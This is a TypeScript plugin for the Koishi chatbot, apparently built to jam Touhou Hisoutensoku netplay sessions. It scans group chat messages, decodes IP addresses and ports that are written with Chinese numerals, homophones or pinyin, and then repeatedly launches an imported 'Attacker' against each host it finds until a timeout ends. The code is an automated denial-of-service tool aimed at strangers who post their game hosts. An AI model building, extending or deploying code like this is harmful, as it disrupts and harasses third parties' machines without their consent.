import "source-map-support/register";
import { Logger, Context, Schema, segment } from "koishi";
import { Attacker } from "./attacker";
import moment from "moment";

export interface HisoutensokuJammerConfig {
  attackTimeout?: number;
  addressWhitelist?: string[];
}

const chineseCharacterList = [
  { character: '⑩', value: 0 },
  { character: '①', value: 1 },
  { character: '②', value: 2 },
  { character: '③', value: 3 },
  { character: '④', value: 4 },
  { character: '⑤', value: 5 },
  { character: '⑥', value: 6 },
  { character: '⑦', value: 7 },
  { character: '⑧', value: 8 },
  { character: '⑨', value: 9 },
  { character: '⑪', value: 11 },
  { character: '⑫', value: 12 },
  { character: '⑬', value: 13 },
  { character: '⑭', value: 14 },
  { character: '⑮', value: 15 },
  { character: '⑯', value: 16 },
  { character: '⑰', value: 17 },
  { character: '⑱', value: 18 },
  { character: '⑲', value: 19 },
  { character: '⑳', value: 20 },
  { character: 'ling', value: 0 },
  { character: 'yi', value: 1 },
  { character: 'er', value: 2 },
  { character: 'san', value: 3 },
  { character: 'si', value: 4 },
  { character: 'wu', value: 5 },
  { character: 'liu', value: 6 },
  { character: 'qi', value: 7 },
  { character: 'ba', value: 8 },
  { character: 'jiu', value: 9 },
  { character: 'shi', value: 10 },
  { character: '零', value: 0 },
  { character: '〇', value: 0 },
  { character: '洞', value: 0 },
  { character: '一', value: 1 },
  { character: '壹', value: 1 },
  { character: '妖', value: 1 },
  { character: '衣', value: 1 },
  { character: '依', value: 1 },
  { character: '二', value: 2 },
  { character: '贰', value: 2 },
  { character: '两', value: 2 },
  { character: '三', value: 3 },
  { character: '叁', value: 3 },
  { character: '伞', value: 3 },
  { character: '四', value: 4 },
  { character: '肆', value: 4 },
  { character: '五', value: 5 },
  { character: '伍', value: 5 },
  { character: '唔', value: 5 },
  { character: '武', value: 5 },
  { character: '六', value: 6 },
  { character: '陆', value: 6 },
  { character: '溜', value: 6 },
  { character: '七', value: 7 },
  { character: '柒', value: 7 },
  { character: '期', value: 7 },
  { character: '漆', value: 7 },
  { character: '拐', value: 7 },
  { character: '八', value: 8 },
  { character: '捌', value: 8 },
  { character: '怕', value: 8 },
  { character: '把', value: 8 },
  { character: '扒', value: 8 },
  { character: '吧', value: 8 },
  { character: '巴', value: 8 },
  { character: '爸', value: 8 },
  { character: '九', value: 9 },
  { character: '玖', value: 9 },
  { character: '勾', value: 9 },
  { character: '十', value: '' },
  { character: '拾', value: '' },
  { character: '百', value: '' },
  { character: '佰', value: '' },
  { character: '千', value: '' },
  { character: '仟', value: '' },
  { character: '万', value: '' },
].map(list => ({ characterRegExp: new RegExp(list.character, 'g'), value: list.value.toString() }));

class HisoutensokuJammer {
  log: Logger;
  lastMessageMap = new Map<string, string>();
  constructor(private ctx: Context, private config: HisoutensokuJammerConfig) {
    this.log = ctx.logger("hisoutensoku-jammer");
  }

  apply() {
    this.ctx.middleware(async (session, next) => {
      const sender = session.userId;
      const message = session.content;
      this.handleMessage(message, sender).then();
      return next();
    });
  }

  combineMessage(message: string) {
    const segmentChain = segment.parse(message);
    const textSegments = segmentChain.filter(segment => segment.type === 'text');
    return textSegments.map(segment => segment.data.content).join('').trim();
  }

  async handleMessage(message: string, sender: string) {
    let realMessage = this.combineMessage(message).split('\n').join(' ');
    for (let chineseCharacter of chineseCharacterList) {
      realMessage = realMessage.replace(chineseCharacter.characterRegExp, chineseCharacter.value)
    }
    const lastMessage = this.lastMessageMap.get(sender);
    this.lastMessageMap.set(sender, realMessage);
    let messageMatch: RegExpMatchArray = realMessage.match(
      /([1-2]? *\d? *\d *)(([^\d][1-2]?\d{1,2}){3}).+?([1-6] *\d *\d *\d *\d)/g
    );
    if (!messageMatch && lastMessage) {
      const combinedMessage = `${lastMessage} ${realMessage}`;
      messageMatch = combinedMessage.match(
        /([1-2]? *\d? *\d *)(([^\d][1-2]?\d{1,2}){3}).+?([1-6] *\d *\d *\d *\d)/g
      );
    }
    if (!messageMatch) {
      return;
    }
    const attackPromises = messageMatch.map((pattern) => {
      const patternMatch = pattern.match(
        /([1-2]? *\d? *\d *)(([^\d][1-2]?\d{1,2}){3}).+?([1-6] *\d *\d *\d *\d)/
      );
      const firstDigit = patternMatch[1].replace(/ +/g, '');
      const address = `${firstDigit}.${patternMatch[2].slice(1).split(/[^\d]/).join(".")}`;
      const port = parseInt(patternMatch[4].replace(/ +/g, ''));
      return this.startAttack(address, port);
    });
    const results: boolean[] = await Promise.all(attackPromises);
  }

  async startAttack(address: string, port: number): Promise<boolean> {
    if (this.config.addressWhitelist.includes(address)) {
      this.log.info(`Attack of ${address}:${port} skipped.`);
      return false;
    }
    this.log.info(`Attack of ${address}:${port} started.`);
    const currentTime = moment();
    while (moment().diff(currentTime) <= this.config.attackTimeout) {
      const attacker = new Attacker(address, port, 1000);
      let err;
      try {
        err = await attacker.attack();
      } catch (e) {
        err = `Error: ${e.toString()}`;
      }
      if (err) {
        this.log.warn(`Attack of ${address}:${port} failed: ${err}`);
      } else {
        this.log.info(`Attack of ${address}:${port} succeeded.`);
      }
    }
    this.log.info(`Attack of ${address}:${port} finished.`);
    return true;
  }
}

export const name = "hisoutensoku-jammer";
export const schema: Schema<HisoutensokuJammerConfig> = Schema.object({
  attackTimeout: Schema.number('干扰时间。').default(10000),
  addressWhitelist: Schema.array(Schema.string(), 'IP 白名单').default([])
})
export function apply(
  ctx: Context,
  config: HisoutensokuJammerConfig
) {
  const hisoutensokuJammer = new HisoutensokuJammer(ctx, config);
  hisoutensokuJammer.apply();
}
